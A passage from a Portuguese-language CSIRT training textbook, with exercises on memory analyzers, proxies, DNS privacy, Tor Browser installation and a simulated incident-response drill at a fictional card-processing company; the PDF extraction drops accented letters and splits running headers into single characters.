Analisadores de memria Volatility, bulk_extractor, AESKeyFinder, RSAKEyFinder
Leitura recomendada:
1 Malware Analysts Cookbook: Michael Ligh, Steven Adair;
1 Provos, Niels, and Thorsten Holz. Virtual honeypots: from botnet tracking to intrusion
detection. Pearson Education, 2007;
1 Free Automated Malware Analysis Services
http://zeltser.com/reverse-malware/automated-malware-analysis.html
Atividade 8.5 Diferentes formas de ocultar o IP de origem
a. Quais so os principais recursos e ferramentas para ocultar o IP de origem evitando que
o endereamento do seu CSIRT seja mapeado por um atacante?
185

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
Atividade 8.6 Privacidade
a. Discuta os riscos privacidade ao usar um sistema de DNS pblico (OpenDNS ou Google
DNS) para resolver nomes dos acessos de um CSIRT, mesmo que esses acessos se deem
por meio de um servidor proxy.
___________________________________________________________________________________
Atividade 8.7 Uso de proxies
a. Discuta as principais vantagens de utilizao de proxy no processo de resposta a incidentes.
b. Acesse algum servio [1] de web proxy e discuta as suas principais caractersticas, tal
como: encriptao de URL, encriptao de pgina:
[1] https://incloak.com/
186

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atividade 8.8 Deep Web
Essa atividade busca apresentar formas de acessar a Deep Web, mas especifcamente acessar
servios hospedados na rede Tor. Siga os passos a seguir e responda as questes subsequentes.
a. Instalao do Browser Tor Bundle
Acessar o website do projeto Tor:
https://www.torproject.org/projects/torbrowser.html
1. # xz d tor-browser-linux32-X_en-US.tar.xz
# tar -xvf tor-browser-linux32-X_en-US.tar
2. # cd tor-browser_en-US/
3. # ./start-tor-browser
*No necessrio ser super-usurio para instalar o browser.
** Caso seja necessrio, o software de compresso xz pode ser instalado:
# sudo apt-get install xz
Aps a execuo do browser, acesse a pgina de teste para certifcar-se de que o sistema Tor
est em funcionamento: https://check.torproject.org
b. Atravs do browser Tor, acesse o site a seguir e identifque o seu endereo IP de sada:
http://www.meuip.com.br/
Figura 8.5
Verifcao da
rede TOR.
187

C
a
p

t
u
l
o


8

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

8
c. Atravs de mecanismos de busca, identifque websites hospedados em domnios
.onion. O que os domnios .onion representam? Esses websites so acessveis via
internet convencional?
d. Existem servios de conversao (chat/IRC) sendo executados sobre a rede Tor?
188

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
189

C
a
p

t
u
l
o


9

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
9
Dinmica de tratamento
de incidentes
Realizar a dinmica de tratamento de incidentes; Levantar questes relacionadas
ao processo de tratamento de incidentes; Vivenciar as etapas necessrias para o
tratamento de incidentes.
Tratamento de incidentes; O papel de um CSIRT dentro de uma organizao.


Introduo
Este captulo consiste em uma dinmica de tratamento de segurana que ser realizada
em equipes. O objetivo dessa dinmica exercitar os conceitos e tcnicas apresentados no
curso em um evento de segurana simulado.
q Para isso, importante considerar:
1 A atividade ser realizada em equipes independentes;
1 A equipe representar o CSIRT da instituio fnanceira;
1 A equipe deve eleger um representante para comunicar as aes do CSIRT;
1 Os grupos podem demandar aes para investigar o incidente;
1 Todas as informaes devem ser solicitadas diretamente ao instrutor ou monitor
atravs do representante do time;
1 Evite olhar o material trate essa dinmica como um incidente em andamento.
Contextualizao
q Nesta atividade, o seu grupo representar o time de resposta a incidentes de uma
instituio fnanceira denominada CARTEX. A instituio que o seu CSIRT representa
uma empresa de grande porte no setor de autorizao de transaes bancrias usando
cartes de crdito dos mais diversos consumidores.
O faturamento anual da empresa supera R$ 1 bilho, o que posiciona a empresa como uma das
lderes do mercado do pagamento eletrnico, e possui as suas aes negociadas tanto na Bolsa
de Valores de So Paulo (BM&FBOVESPA) quanto na Bolsa de Valores de Nova York (NYSE).
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
190

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Como se sabe, a rea fnanceira muito visada por fraudadores e atacantes que buscam aplicar
golpes com motivaes fnanceiras. No ltimo ano, entretanto, a sua empresa foi comprometida,
o que causou enormes prejuzos para empresa. Alm do desgaste da imagem institucional, as
aes da empresa sofreram grande desvalorizao quando o incidente tornou-se pblico.

Como resultado, todo o departamento de TI foi restruturado. Em especial, a equipe de
resposta a incidente foi reorganizada e posicionada em uma posio estratgica no organo-
grama da empresa.
Figura 9.1
Repercusso
do ataque
instituio.
191

C
a
p

t
u
l
o


9

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
SIFRA
q O time de resposta a incidentes de seguranas da empresa SIFRA j est estabelecido e
denominado SIFRA. Nesta dinmica, o seu grupo atuar no contexto do CSIRT SIFRA.
Para isso, importante descrever algumas caractersticas do prprio grupo estabelecido.
Como comentado, o SIFRA, possui uma estratgica na organizao da estrutura da empresa,
como pode ser observado na fgura a seguir. O atual CIO da empresa d total apoio ao SIFRA
e qualquer incidente de segurana reportado na reunio do conselho executivo, na pre-
sena dos demais diretores.
Presidncia
SIFRA
Coordenao
de projetos
Misso do SIFRA
Prover resposta rpida e efcaz para qualquer problema de segurana que envolva a
empresa, limitando os eventuais danos a nveis aceitveis e reportando qualquer fraude
para a diretoria executiva dentro de um perodo mximo de 12 (doze) horas.
Abrangncia operacional
Redes, endereos IP e domnios atendidos pela CARTEX.
A sua equipe responsvel por coordenar as atividades de segurana entre os diferentes
departamentos das instituies, incluindo fliais localizadas em outros estados. Todas as
informaes de segurana so centralizadas no SIFRA, que responsvel pela comunicao
com os demais departamentos. Como resultado, o SIFRA encarrega-se de produzir um
resumo executivo de todas as atividades e apresent-lo semanalmente diretoria executiva.
Figura 9.2
Estrutura
organizacional da
empresa CARTEX.
192

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Tratamento de incidentes de segurana
O exerccio de tratamento de incidentes de segurana comea agora. A partir desse momento,
cada grupo tomar suas decises de forma independente, sempre seguindo as instrues do
professor/monitor. Com a evoluo das investigaes, a equipe receber novas evidncias que
ajudaram o SIFRA a avaliar melhor o incidente de segurana como um todo.
q Fatos iniciais:
1 Hoje 10 fevereiro de 2014, 9h da manh;
1 Na caixa de e-mails do CSIRT, so encontradas diversas mensagens, entre elas:
From: csirt@universidade.exemplo.com.br
To: csirt@sifra.banco
Subject: Mquina enviando spam - 10.10.10.20
Date: Fri, 7 Feb 2014 18:54:10 -0200 (BRST)
Senhores,
Recebemos inmeros e-mails fraudulentos oriundos da mquina
10.10.10.20. Abaixo a mensagem que foi recebida.
Atenciosamente,
--
CSIRT
<csirt@universidade.exemplo.com.br>
----- Forwarded message from Webmail.universidade.exemplo.com.
br <carlao@sifra.banco> -----
Delivered-To: aluno@universidade.exemplo.com.br
<....>
Alm dessa mensagem, so encontradas outras duas mensagens relativas ao mesmo
assunto. Neste momento o seu grupo receber as trs mensagens impressas:
1 Prova A1;
1 Prova A2;
1 Prova A3.
A partir desse momento, a atividade continuar com base nas suas respostas aos ques-
tionamentos anteriores. Cada ao ter uma reao, e possivelmente novas informaes
so disponibilizadas a equipe pelo instrutor/monitor.
193

C
a
p

t
u
l
o


9

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

9
Roteiro de atividades 9
Atividade 9.1 Reunio
Diante da diretoria, um integrante descrever a real situao do incidente sendo investigado.
Lembre-se de alguns aspectos importantes:
O incidente est sob investigao: isso signifca que novas provas podem mudar totalmente
o rumo da investigao.
A mesa composta por pessoas com diferentes reas de conhecimento. Atenha-se a fatos
relevantes e utilize termos no tcnicos
Anlise as informaes crticas das mensagens e tente entender o que est acontecendo. A
seguir algumas questes que o CSIRT deve responder na primeira reunio com a diretoria da
empresa CARTEX:
1. Com base nessas informaes, o que o SIFRA deve fazer?
2. Qual procedimento adotar em relao a notifcao recebida pela universidade?
3. Qual ser a resposta a ser dada ao gerente?
4. Quais informaes o SIFRA deve buscar?
Para no revelar mais informaes sobre o incidente e no prejudicar a investigao, as
demais tarefas sero passadas diretamente pelo instrutor do curso.

ISBN 978-85-63630-19-3
9 788563 630193
O livro oferece formao prtica e aprendizado terico
-
mao e de TIC que necessitem desenvolver competncias
e habilidades para iniciarem a rea de Tratamento de In-
cidentes, implementarem e estabelecerem uma Equipe
de Tratamento e Resposta a Incidentes em Redes
apto a criar e gerenciar uma equipe de respostas a incidentes
de segurana, como tambm, a utilizar as tcnicas e
ferramentas para tratamento de incidentes.
Este livro inclui os roteiros de atividades prticas e o conte-
do dos slides apresentados em sala de aula, apoiando
suas organizaes ou localidades de origem.
L
I
V
R
O

D
E

A
P
O
I
O

A
O

C
U
R
S
O